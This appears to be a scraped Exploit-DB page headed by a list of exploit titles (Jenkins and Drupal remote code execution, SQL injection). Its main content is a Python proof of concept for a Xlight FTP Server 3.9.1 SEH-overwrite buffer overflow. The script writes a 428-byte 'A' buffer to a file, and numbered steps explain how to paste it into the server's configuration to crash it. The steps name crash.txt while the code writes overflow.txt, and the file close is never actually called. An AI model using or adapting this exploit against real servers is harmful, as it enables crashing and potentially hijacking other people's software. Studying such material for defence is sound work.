bb86158c6e
7 changes to exploits/shellcodes Xlight FTP Server 3.9.1 - Buffer Overflow (PoC) Jenkins - Remote Code Execution Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution zzzphp CMS 1.6.1 - Remote Code Execution PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection News Website Script 2.0.5 - SQL Injection Advance Gift Shop Pro Script 2.0.3 - SQL Injection Drupal < 8.6.9 - REST Module Remote Code Execution
33 lines
No EOL
898 B
Python
Executable file
33 lines
No EOL
898 B
Python
Executable file
# Exploit Title: Xlight 3.9.1 FTP Server SEH Overwrite
|
|
# Google Dork: N/A
|
|
# Date: 2019-02-24
|
|
# Exploit Author: Logan Whitmire
|
|
# Vendor Homepage: https://www.xlightftpd.com/index.htm
|
|
# Software Link: https://www.xlightftpd.com/download/xlight.zip
|
|
# Version: 3.9.1
|
|
# Tested on: Windows XP
|
|
# CVE : N/A
|
|
|
|
|
|
POC:#!/usr/bin/python
|
|
#Vulnerable Software: Xlight FTP Server 3.9.1
|
|
#Link: https://www.xlightftpd.com/download.htm
|
|
#Date: 2019-02-24
|
|
#Twitter: thermal_tp
|
|
#inspired by bzyo's exploit
|
|
# 1. Generate overflow.txt, open, and copy contents to clipboard
|
|
# 2. Virtual Server
|
|
# 3. Modify Virtual Server Configuration
|
|
# 4. Advanced
|
|
# 5. Misc
|
|
# 6. Execute a program after user logged in
|
|
# 7. Setup
|
|
# 8. Paste crash.txt contents
|
|
# 9. Application crashes
|
|
# 10. SEH is overwritten
|
|
|
|
buffer="A"*428
|
|
file="overflow.txt"
|
|
generate=open(file, "w")
|
|
generate.write(buffer)
|
|
generate.close |